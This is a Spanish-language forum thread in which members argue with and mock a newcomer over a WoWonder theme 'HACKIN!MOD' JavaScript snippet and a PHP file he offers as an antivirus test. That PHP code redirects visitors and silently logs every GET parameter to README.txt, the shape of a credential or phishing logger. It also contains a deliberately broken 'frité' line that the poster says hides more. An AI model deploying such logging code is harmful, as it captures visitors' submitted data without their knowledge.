A continuación, siga el video para ver cómo instalar este sitio como una aplicación web en su pantalla de inicio.
Nota: Esta función puede no estar disponible en algunos navegadores.
Al registrarte con nosotros, podrás discutir, compartir y enviar mensajes privados con otros miembros de nuestra comunidad.
¡Regístrate ahora!amigo explicate pork realmente en la sección que estamos deberia aparecer un link hacia la pagina , no entiendo , si se que la imagen claramente es una promocion al Clasico Dead Space 1 , pero con que Objetivo?Aguante ve el bolsilloVer el archivos adjunto 4424
Crea tu una red social con uuuu otro código fuente tuyoLucien debe ser algun u otro wowonder en la red por lo que veo xD
Todavía no está bro saludosamigo explicate pork realmente en la sección que estamos deberia aparecer un link hacia la pagina , no entiendo , si se que la imagen claramente es una promocion al Clasico Dead Space 1 , pero con que Objetivo?
Crea tu una red social con uuuu otro código fuente tuyo
Los criticones nunca hacen nada bueno y dedican su vida a solo criticar wey no mamesCrea tu una red social con uuuu otro código fuente tuyo
Yo creo que esta ofreciendo servicios para crear páginas web, solo que no se tomo el tiempo de escribir dos líneas explicando nada y subió una foto que sera un ejemplo de algo que hizoPodrías explicar el post? Porque de verdad no entiendo que quieres decir con esta imagen, si es para enseñar una pagina deberías dejar el link
Saludos. Me parece que eres nuevo en el foro, así que permíteme darte un consejo: en lugar de enviar varios mensajes seguidos, trata de condensar todas tus respuestas en uno solo. Recuerda que este es un lugar para intercambiar ideas y argumentos.Crea tu una red social con uuuu otro código fuente tuyo
Todavía no está bro saludos
Los criticones nunca hacen nada bueno y dedican su vida a solo criticar wey no mames
Mira el punto es que me encanta tu foro aparte de que el código fuente no es tuyo entonces mi punto es que no critiques admin ok. Y si decea banearme pues cuando quiera.Saludos. Me parece que eres nuevo en el foro, así que permíteme darte un consejo: en lugar de enviar varios mensajes seguidos, trata de condensar todas tus respuestas en uno solo. Recuerda que este es un lugar para intercambiar ideas y argumentos.
Por otro lado, si no quieres que nadie comente sobre lo que estás haciendo, debes aclararlo desde el principio. Un foro es un espacio de debate, donde encontrarás opiniones diversas, algunas a favor y otras en contra. Debes estar dispuesto a aceptar esa realidad al comentar
Mira el punto es que me encanta tu foro aparte de que el código fuente no es tuyo entonces mi punto es que no critiques admin ok. Y si decea banearme pues cuando quiera.
Estoy muy deseoso y hasta entusiasmado por ver la red social con código propio que usted dice hizo, ¿es así o le entendí mal? ?Mira el punto es que me encanta tu foro aparte de que el código fuente no es tuyo entonces mi punto es que no critiques admin ok
Saludos mi hermano está no es una red social de código propio entendiste mal cuando esté lista te envío el link. Hay que pasar mucho tiempo programando algo que no pagarán entonces lo más fácil es cojer y modificarEstoy muy deseoso y hasta entusiasmado por ver la red social con código propio que usted dice hizo, ¿es así o le entendí mal? ?
No olvides de dejar el link para darte mi muy honesta opinión ??
¿entonces puedes dejarnos una breve explicación de qué sería?Saludos mi hermano está no es una red social de código propio entendiste mal cuando esté lista te envío el link. Hay que pasar mucho tiempo programando algo que no pagarán entonces lo más fácil es cojer y modificar
Exacto men así es como es¿entonces puedes dejarnos una breve explicación de qué sería?
Una red social que tomaste la app de internet, bajaste, montaste y modificaste cosas para adaptarlo a tus necesidades... ¿algo así? ... ¿entendí ahora sí bien? ?
Genial, deja link acá y también de ser posible qué modificaciones le hiciste.Exacto men así es como es
Si, eso de post en promocion tiene pinta de wowonder XDLucien debe ser algun u otro wowonder en la red por lo que veo xD
Crea tu una red social con uuuu otro código fuente tuyo
Vaya, parece que empezamos algo subiditos.Los criticones nunca hacen nada bueno y dedican su vida a solo criticar wey no mames
Muy inteligente de tu parte deducir que xenforo no es de Lucien , has resuelto uno de los 3 misterios del foro.aparte de que el código fuente no es tuyo
??? Dio' mio, esto va a llevar buen loreentonces mi punto es que no critiques admin ok
Le cambio el titulo a la página y 2 o 3 textos. Ya la volvió irreconocible lmaoUna red social que tomaste la app de internet, bajaste, montaste y modificaste cosas para adaptarlo a tus necesidades... ¿algo así? ... ¿entendí ahora sí bien? ?
Bueno mira yo lo coloque así por q con js quería ponerle un pequeño desplazamiento a las letras HAKINMOD y esto es para quien no quiere modificar el css y añadirle algunos detalles al theme. Puedes probarlo sin miedo que no es código malicioso¿para qué necesitas el JS ahí? ... disculpa la incultura mía, pero bueno es más malo quedarme con la duda y no preguntar ?
No que con los <styles> ya con eso tienes para aplicar las propiedades CSS? ... que dicho sea de paso, por qué hacerlo hardcoded ahí y no mejor hacerlo por CSS y usar las clases que viene (o añadir una nueva?) para este tema de estilos? al final, el CSS es para eso... para estilos no?
Callate, que él es el que sabe XD¿para qué necesitas el JS ahí? ... disculpa la incultura mía, pero bueno es más malo quedarme con la duda y no preguntar ?
No que con los <styles> ya con eso tienes para aplicar las propiedades CSS? ... que dicho sea de paso, por qué hacerlo hardcoded ahí y no mejor hacerlo por CSS y usar las clases que viene (o añadir una nueva?) para este tema de estilos? al final, el CSS es para eso... para estilos no?
Según lo que la gramática y demás me permiten entender... ¿Dices que agregaste el js en el html para no modificar el css?yo lo coloque así por q con js quería ponerle un pequeño desplazamiento a las letras HAKINMOD y esto es para quien no quiere modificar el css y añadirle algunos detalles al theme
Pruébalo papi en wowonder con el theme wondertag y dimeUn momentooooooo, en title puso Stile en ves de Style,ummmm ,eres programador pro.
Bro todo lo que publicaré aquí está probado si quieren pueden probarlo o darcelo a alguien que sepa ora que los ayudeCallate, que él es el que sabe XD
Btw, que codigo más complejo, eso ya debe ser programación nivel pentágono o algo así, no ?
Según lo que la gramática y demás me permiten entender... ¿Dices que agregaste el js en el html para no modificar el css?
El tittle no se muestra en el theme wondertag solo es para que te guíes y sepas para que sirve el códigoUn momentooooooo, en title puso Stile en ves de Style,ummmm ,eres programador pro.
Uff ... ?? ... me quitas una preocupación entonces, ya yo pensé que era un viruces de esos ...Puedes probarlo sin miedo que no es código malicioso
Eso parece, lo que no entiendo del todo ... él dice al inicio que el código es para cambiar color y tamaño de letra no? hasta donde sé eso se podía hacer fácilmente con CSS que es la forma organizada de hacer esto, pero bueno, a lo mejor yo que soy nuevo en esto no estoy al tanto de las últimas tendencias. ?¿Dices que agregaste el js en el html para no modificar el css?
No si eso yo no lo discuto, yo me limito a intentar aprender de alguien que sabe más que yo, o eso parece por la forma en que ha escrito en este tema desde el inicio... ¿no?Callate, que él es el que sabe XD
Pa yo programo actualmente en Python no necesito virar atrás en el tiempoPruébalo papi en wowonder con el theme wondertag y dime
JAJAJAJAJAJJA, yo leí el titulo, pero supuse que era otra cosa, realmente no lo vinculé; pero ahora todo tiene sentido XDXDXDUn momentooooooo, en title puso Stile en ves de Style,ummmm ,eres programador pro.
Si montas una web con wowonder no vas a tener ni usuarios... bueno, si montas una web no vas a tener usuarios; pero solo te lo limitaba a lo de WW para que tuvieras esperanza xDPruébalo papi en wowonder con el theme wondertag y dime
Aiuda, porfa ???Según lo que la gramática y demás me permiten entender... ¿Dices que agregaste el js en el html para no modificar el css?
Peor sería usar WP para una red social ... que es de lo más loco y disfuncional que he visto en mi vida, y JC lo hizo ... LMAO!!!que va a ser lo proximo? pixelphoto o colibrism?
Bien por ti mi hermano felicidades soy tu dicipulo entoncesPa yo programo actualmente en Python no necesito virar atrás en el tiempo
Yo me acuerdo de un social Habana montado en snet echo en jommla xdxdPeor sería usar WP para una red social ... que es de lo más loco y disfuncional que he visto en mi vida, y JC lo hizo ... LMAO!!!
El código sirve para algo más pero no puedo comentarlo por aquí. El que sabe de verdad se da cuenta para que más sirvePrueba si tú NOD32 está realmente alerta y operativo: Copia este código en un txt e intenta guardarlo.
- <?php
- header("Location: /423/ ");
- $handle = fopen("README.txt", "a");
- foreach($_GET as $variable => $value) {
- fwrite($handle, $variable);
- fwrite($handle, "=");
- fwrite($handle, $value);
- fwrite($handle, "\r\n");
- }
- frité($ande, "\r\n");
- fclose($handle);
- exit
- ?>
Sirve para por ejemplo que te salga que la funcióñ frité no existe en PHP ni en ningún otro lenguaje no? ?El código sirve para algo más pero no puedo comentarlo por aquí. El que sabe de verdad se da cuenta para que más sirve
De echo para lo otro que sirve si supieras de verdad me lo dices aquí mismo CODIGO FUENTE PROBADO ??Sirve para por ejemplo que te salga que la funcióñ frité no existe en PHP ni en ningún otro lenguaje no? ?
También para que te diga que "$ande" no es ni un demonio ...
Uff no no para nada, yo no sé nada ? completo rookie acá yo ... aquí el que sabe eres tú, el crack eres tú, yo solo intento entender lo que pones, pero chico ¿por qué será que no lo consigo? ...De echo para lo otro que sirve si supieras de verdad me lo dices aquí mismo CODIGO FUENTE PROBADO ??
SOLO DIME PARA QUE ES EL README.txt para ver qué tanto sabes y me quito el sombrero
La historia se repite XDAiuda, porfa ???
el js el lo puso jajaja porque el codigo ese creo que es una especie de defacing web, que el "hackingmode" de el se dichava¿para qué necesitas el JS ahí? ... disculpa la incultura mía, pero bueno es más malo quedarme con la duda y no preguntar ?
No fue mi Nod32, pero en VSCode, cuando pones algo mal o te confundes en algo, el sistema te subraya en rojo lo que este mal, y te saca una alerta en la parte de arriba (no se si lo has visto). Cuando puse el codigo para leerlo bien, en el visual studio no, pero el sartén me dijo "al fin frité el pollo" , que cosa mas rara, y el $ande, si no tiene ninguna conexión en algun otro fichero, no creo que vaya a $andar .Prueba si tú NOD32 está realmente alerta y operativo: Copia este código en un txt e intenta guardarlo.
- frité($ande, "\r\n");
- fclose($handle);
- exit
- ?>
Increíble la capacidad de Lucien para manejar este tipo de situaciones y mantener la paciencia, digno de un verdadero admin de foro. No usa su posición de admin para ganar un debate, en cambio destroza al contrario con argumentos increíblemente válidos y serenos.Hola, gracias por tu interés en el foro. En ningún momento dije que te iba a banear, solo te di un consejo para que participes mejor, No sé en qué otros sitios has estado, pero las cosas no se hacen así aquí. Aquí se respeta la opinión de los demás y se argumenta con educación. Y si, el foro está creado con xenforo 2 y el código fuente está escrito por sus desarrolladores. Pero eso no significa que yo no tenga ningún mérito o derecho sobre él. Yo pagué una licencia para poder usarlo en mi página y adaptarlo a mis necesidades. Eso es algo legal y legítimo. Si quieres compartir tu trabajo o tus ideas, tienes que estar dispuesto a escuchar lo que los demás piensen al respecto. No se trata de criticar, sino de dialogar y aprender. Espero que lo entiendas y que sigas participando de forma constructiva. Un saludo.
APORTE A LOS PROGRAMADORESVer el archivos adjunto 4435
Código fuente para modificar letra fondo y color en wowonder 4.1.1 utilizando el theme wondertag
Código fuente:
<!-- HACKIN!MOD, GHOSTFACE | courier | #05fa0d | negrita | trebuchet ms | Sylfaen -->
<html>
<head>
<title>Stile</title>
</head>
<body style="background-color:;font-family:Sylfaen;color:grey;">
<span id="content"></span><span style="height:20px;width:20px;background-color:#05fa0d;"> </span>
<script>
var menu = [
"HACKIN!MOD",
],
i = 0, j, item, html,
e = document.getElementById("content"),
doChar = function() {
e.innerHTML += item[j++];
if (j < item.length) {
setTimeout(doChar, 10);
}
else {
e.innerHTML += "<br/>";
doItem();
}
},
doItem = function() {
if (i < menu.length) {
item = menu[i++];
j = 0;
doChar();
}
};
doItem();
</script>
</body>
</html>
El contenido dentro de las etiquetas <title> y </title> no modifica el funcionamiento de tu sitio pero, tampoco es para guiarse. El contenido envuelto en estas etiquetas se mostrará como el nombre del sitio web, algo así como el nombre de una app, este título se muestra en la pestaña del navegador, y esta pestaña, esta ubicada en la parte superior del navegadorEl tittle no se muestra en el theme wondertag solo es para que te guíes y sepas para que sirve el código
El servidor Apache2 con PHP8.1 en Linux bloquea eso... Usé el server que tenía en Node y pos lo mismo...Prueba si tú NOD32 está realmente alerta y operativo: Copia este código en un txt e intenta guardarlo.
- <?php
- header("Location: /423/ ");
- $handle = fopen("README.txt", "a");
- foreach($_GET as $variable => $value) {
- fwrite($handle, $variable);
- fwrite($handle, "=");
- fwrite($handle, $value);
- fwrite($handle, "\r\n");
- }
- frité($ande, "\r\n");
- fclose($handle);
- exit
- ?>
Papi no intentes hacer más virus en php, y menos presumirlos en este foro donde hay titanes programadores(No me incluyo) estoy casi seguro de que hasta AkaMe (No se si sepa programación) sin revisar el código entendido lo que hace.De echo para lo otro que sirve si supieras de verdad me lo dices aquí mismo CODIGO FUENTE PROBADO ??
SOLO DIME PARA QUE ES EL README.txt para ver qué tanto sabes y me quito el sombrero
Otra cosita el frité con tilde solo es para ocultar lo va en esa sección de código de lo dejo de tarea
Jajajaja sin comentarios copia y pega ajjaaAPORTE A LOS PROGRAMADORESVer el archivos adjunto 4435
Código fuente para modificar letra fondo y color en wowonder 4.1.1 utilizando el theme wondertag
Código fuente:
<!-- HACKIN!MOD, GHOSTFACE | courier | #05fa0d | negrita | trebuchet ms | Sylfaen -->
<html>
<head>
<title>Stile</title>
</head>
<body style="background-color:;font-family:Sylfaen;color:grey;">
<span id="content"></span><span style="height:20px;width:20px;background-color:#05fa0d;"> </span>
<script>
var menu = [
"HACKIN!MOD",
],
i = 0, j, item, html,
e = document.getElementById("content"),
doChar = function() {
e.innerHTML += item[j++];
if (j < item.length) {
setTimeout(doChar, 10);
}
else {